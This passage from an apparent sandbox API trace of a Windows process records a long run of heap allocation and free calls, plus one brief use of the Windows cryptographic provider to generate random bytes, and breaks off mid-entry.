(HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f53780 [0089.167] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x10) returned 0x1f53808 [0089.167] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f53820 [0089.167] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x10) returned 0x1f538a8 [0089.167] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f538c0 [0089.167] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x10) returned 0x1f53948 [0089.167] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f53960 [0089.167] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x8000) returned 0x1f539e8 [0089.169] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x40) returned 0x1f5b9f0 [0089.170] RtlReAllocateHeap (Heap=0x1f50000, Flags=0x0, Ptr=0x1f53640, Size=0x180) returned 0x1f5ba38 [0089.171] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5b9f0 | out: hHeap=0x1f50000) returned 1 [0089.171] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f539e8 | out: hHeap=0x1f50000) returned 1 [0089.171] CryptAcquireContextA (in: phProv=0x2ef774, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2ef774*=0x585f00) returned 1 [0089.172] CryptGenRandom (in: hProv=0x585f00, dwLen=0x24, pbBuffer=0x1e98aa | out: pbBuffer=0x1e98aa) returned 1 [0089.172] CryptReleaseContext (hProv=0x585f00, dwFlags=0x0) returned 1 [0089.172] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x10) returned 0x1f53640 [0089.172] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f5bbc0 [0089.174] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x10) returned 0x1f53658 [0089.174] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f5bc48 [0089.174] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x10) returned 0x1f5bce8 [0089.174] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f5c4d0 [0089.174] RtlReAllocateHeap (Heap=0x1f50000, Flags=0x0, Ptr=0x1f5bbc0, Size=0x180) returned 0x1f5c558 [0089.180] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f5bbc0 [0089.180] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f5c6e0 [0089.180] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f5c768 [0089.180] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f5c7f0 [0089.180] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f5c878 [0089.180] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57720 [0089.180] RtlReAllocateHeap (Heap=0x1f50000, Flags=0x0, Ptr=0x1f57720, Size=0x180) returned 0x1f5c900 [0089.181] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57720 [0089.181] RtlReAllocateHeap (Heap=0x1f50000, Flags=0x0, Ptr=0x1f57720, Size=0x200) returned 0x1f5ca88 [0089.182] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57720 [0089.182] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x200) returned 0x1f5cc90 [0089.182] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f577a8 [0089.182] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.182] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f578b8 [0089.182] RtlReAllocateHeap (Heap=0x1f50000, Flags=0x0, Ptr=0x1f578b8, Size=0x200) returned 0x2576b90 [0089.182] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f578b8 [0089.182] RtlReAllocateHeap (Heap=0x1f50000, Flags=0x0, Ptr=0x1f578b8, Size=0x180) returned 0x2576d98 [0089.182] RtlReAllocateHeap (Heap=0x1f50000, Flags=0x0, Ptr=0x1f577a8, Size=0x180) returned 0x2576f20 [0089.182] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f577a8 [0089.182] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f577a8 | out: hHeap=0x1f50000) returned 1 [0089.183] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576d98 | out: hHeap=0x1f50000) returned 1 [0089.183] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57720 | out: hHeap=0x1f50000) returned 1 [0089.183] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.184] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576f20 | out: hHeap=0x1f50000) returned 1 [0089.184] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5cc90 | out: hHeap=0x1f50000) returned 1 [0089.184] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bbc0 | out: hHeap=0x1f50000) returned 1 [0089.185] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5ca88 | out: hHeap=0x1f50000) returned 1 [0089.185] RtlReAllocateHeap (Heap=0x1f50000, Flags=0x0, Ptr=0x1f5c6e0, Size=0x180) returned 0x1f5ca88 [0089.185] RtlReAllocateHeap (Heap=0x1f50000, Flags=0x0, Ptr=0x1f5c768, Size=0x200) returned 0x1f5cc10 [0089.185] RtlReAllocateHeap (Heap=0x1f50000, Flags=0x0, Ptr=0x1f5c7f0, Size=0x200) returned 0x2576d98 [0089.185] RtlReAllocateHeap (Heap=0x1f50000, Flags=0x0, Ptr=0x1f5c878, Size=0x200) returned 0x2576fa0 [0089.185] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5c558 | out: hHeap=0x1f50000) returned 1 [0089.186] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0089.186] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5ca88 | out: hHeap=0x1f50000) returned 1 [0089.186] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5cc10 | out: hHeap=0x1f50000) returned 1 [0089.186] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576d98 | out: hHeap=0x1f50000) returned 1 [0089.186] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576fa0 | out: hHeap=0x1f50000) returned 1 [0089.186] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.186] RtlReAllocateHeap (Heap=0x1f50000, Flags=0x0, Ptr=0x1f57830, Size=0x180) returned 0x1f5c558 [0089.186] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.187] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.187] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.187] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.187] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.187] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.187] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.188] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.188] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.188] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.188] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.188] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.188] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.188] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.188] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.189] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.189] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.189] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.189] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.189] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.189] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.190] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.190] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.190] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.190] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.190] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.190] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.190] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.191] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.191] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.191] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.191] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.191] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.191] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.191] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.192] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.192] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.192] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.193] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.193] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.193] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.193] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.193] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.193] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.193] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.194] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.194] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.194] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.194] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.194] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.194] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.195] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.195] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.195] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.195] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.195] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.195] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.196] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.196] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.196] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.196] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.196] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.196] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.197] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.197] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.197] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.197] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.198] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.198] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.198] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.198] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.198] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.198] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.199] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.199] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.199] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.199] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.199] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.199] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.200] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.200] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.200] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.200] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.200] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.200] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.200] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.201] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.201] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.201] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.201] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.201] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.201] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.201] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.202] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.202] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.202] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.202] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.202] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.202] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.203] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.203] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.203] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.203] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.203] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.203] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.203] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.204] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.204] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.204] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.204] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.204] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.204] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.204] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.205] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.205] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.205] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.205] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.205] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.205] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.206] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.206] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.206] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.206] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.206] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.206] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.206] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.206] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.207] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.207] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.207] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.208] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.208] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.208] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.208] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.208] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.209] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.209] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.209] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.209] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.209] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.209] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.209] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.209] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.210] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.210] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.210] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.210] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.210] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.210] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.210] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.211] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.211] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.211] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.211] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.211] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.211] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.211] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.212] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.212] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.212] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.212] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.212] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.212] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.213] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.213] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.213] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.213] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.213] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.213] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.213] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.213] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.214] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.214] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.214] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.214] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.214] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.214] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.214] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.214] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.215] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: 